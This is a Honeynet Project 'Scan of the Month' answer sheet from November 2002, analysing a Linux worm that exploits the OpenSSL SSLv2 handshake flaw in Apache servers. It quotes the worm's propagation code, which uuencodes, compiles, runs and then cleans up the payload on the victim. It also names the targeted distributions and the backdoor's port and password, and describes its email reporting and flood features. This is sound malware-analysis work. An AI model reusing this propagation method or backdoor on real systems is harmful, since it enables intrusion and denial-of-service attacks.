Honeynet Project Scan of the Month - November 2002

Answers to Scan 25

By: Jason Testart <jtestart@ryerson.ca>

1. Which is the type of the .unlock file? When was it generated?

Running the file command on Linux yields the answer:
$ file .unlock 
.unlock: gzip compressed data, deflated, last modified: Fri Sep 20 06:59:04 2002
, os: Unix
$ gzip -l -S "" .unlock
         compressed        uncompressed  ratio uncompressed_name
              17973               81920  78.0% .unlock
$ mv .unlock .unlock.Z
$ gunzip .unlock.Z
$ file .unlock
.unlock: GNU tar archive
So, the file .unlock is a gzip compressed tar file generated at 06:59:04 the morning of September 20th, 2002.


2. Based on the source code, who is the author of this worm? When it was created?  Is it compatible with the date from question 1?

To answer this question, I first looked at the table of contents of the unziped tar file:
$ tar tvf .unlock 
-rw-r--r-- root/wheel    70981 2002-09-20 09:28:11 .unlock.c
-rw-r--r-- root/wheel     2792 2002-09-19 17:57:48 .update.c
So, the timestamp of the source files are 2002-09-20 09:28:11 and 2002-09-19 17:57:48 which do not correspond to the date from question 1, since 2002-09-20 09:28:11 is later than Fri Sep 20 06:59:04 2002. This difference could be explained by the gzip file being generated on a different machine from the source code. Perhaps a badly set clock, or a difference in time zones between two computers accounts for the difference?

The comments at the beginning of the .unlock.c file indicate that the worm was written by aion@ukr.net and contem@efnet. I suspect aion@ukr.net wrote most of the "worm" code, with the DDoS code written by contem@efnet.


3. Which process name is used by the worm when it is running?

The worm uses the process name httpd when running. We know this because of lines 78, 1803 through 1805 of the file .unlock.c:
78:#define PSNAME               "httpd "
1803:   for(a=0;argv[0][a]!=0;a++) argv[0][a]=0;
1804:   for(a=0;argv[1][a]!=0;a++) argv[1][a]=0;
1805:   strcpy(argv[0],PSNAME);
The code above re-writes the process name and its single argument with null characters, then writes the value of the macro PSNAME to the process name, which in this case is httpd . Note that in line 1425 of the .unlock.c file, the process on a target computer is first started as:
/tmp/httpd {IP address of attacker}
and ultimately re-writen as:
httpd


4. In wich format the worm copies itself to the new infected machine? Which files are created in the whole process?  After the worm executes itself, wich files remain on the infected machine?

The code block beginning at line 1416 of .unlock.c gives us the answers:
  writem(sockfd,"cat > /tmp/.unlock.uu << __eof__; \n");
  zhdr(1);
  encode(sockfd);
  zhdr(0);
  writem(sockfd,"__eof__\n");
  writem(sockfd,"uudecode -o /tmp/.unlock /tmp/.unlock.uu;   "
                "tar xzf /tmp/.unlock -C /tmp/;              "
                "gcc -o /tmp/httpd  /tmp/.unlock.c -lcrypto; "
                "gcc -o /tmp/update /tmp/.update.c;\n");
  sprintf(rcv,  "/tmp/httpd %s; /tmp/update; \n",localip);
  writem(sockfd,rcv);
  sleep(3);
  writem(sockfd,"rm -rf /tmp/.unlock.uu /tmp/.unlock.c /tmp/.update.c "
                "       /tmp/httpd /tmp/update; exit; \n");
In the code above, we see the worm writing the output of the encode function to the file /tmp/.unlock.uu on the target machine, then using the target machine's uudecode command to generate /tmp/.unlock. The file /tmp/.unlock, a gziped tar file, is then extracted to produce the the C source files /tmp/.unlock.c and /tmp/.update.c, which are in turn compiled to /tmp/httpd and /tmp/update respectively. The worm then runs the the two compiled binaries, and deletes all files except /tmp/.unlock. Only /tmp/.unlock remains on the machine.

The above process corresponds to the code in the encode function. The encode function uuencodes whatever is defined as WORMSRC, in this case, /tmp/.unlock. If this file is missing, then the worm cannot propagate.


5. Which port is scanned by the worm?

The worm does a TCP scan of port 80. This is evident from the call to the atcp_connect function with the SCANPORT parameter, a macro defined to be 80.


6. Which vulnerability the worm tries to exploit?  In which architectures?

The worm tries to exploit the OpenSSL SSLv2 Handshake vulnerability. The vulnerability is discussed in CERT Vulnerability note #102795 .

From line 1241 of the .unlock.c file, we see the array architectures of type struct archs that defines the Linux distribution and corresponding Apache versions that the worm targets. They are:
 
 
Linux Distro Apache Version
Gentoo unknown
Debian 1.3.26
Red-Hat 1.3.6
Red-Hat 1.3.9
Red-Hat 1.3.12
Red-Hat 1.3.19
Red-Hat 1.3.20
Red-Hat 1.3.22
Red-Hat 1.3.23
Red-Hat 1.3.26
SuSE 1.3.12
SuSE 1.3.17
SuSE 1.3.19
SuSE 1.3.20
SuSE 1.3.23
Mandrake 1.3.14
Mandrake 1.3.19
Mandrake 1.3.20
Mandrake 1.3.23
Slackware 1.3.26

 


7. What kind of information is sent by the worm by email?  To which account?

When the worm first infects a computer, it makes an SMTP connection to the mail server freemail.ukr.net and sends an e-mail with from address test@microsoft.com to the account aion@ukr.net. The e-mail contains the hostid and the hostname of the newly infected computer, along with the IP address of the computer that did the infecting (ie. the attacking machine). The code that does this is in the mailme function of the .unlock.c file.


8. Which port (and protocol) is used by the worm to communicate to other infected machines?

The worm uses UDP port 4156 to communicate with other infected machines. It also uses UDP port 10100 to transmit e-mail addresses collected from all filesystems mounted on the infected machine, except /proc, /dev, and /bin, if directed to do so.


9. Name 3 functionalities built in the worm to attack other networks.

Among the many functionalities of this worm are UDP flood, TCP flood, and DNS flood. In a directive to attack, the worm will get the target, port (if applicable), and a duration of time to attack. These values are stored in records of type "*_rec", as defined in .unlock.c. Whenever the worm gets a command to attack, it will relay the command to other infected hosts it knows about.


10. What is the purpose of the .update.c program? Which port does it use?

The .update.c program is a backdoor that listens on TCP port 1052, as defined by the PORT macro. The backdoor requires the  password aion1981.


11. Bonus Question:
What is the purpose of the SLEEPTIME and UPTIME values in the .update.c program?

The UPTIME value is used to determine for how long the backdoor will stay bound and listening on the port PORT before closing all sockets and sleeping for SLEEPTIME seconds. The backdoor program runs in a continuous loop, listening for 10 seconds, then sleeping for 5 minutes.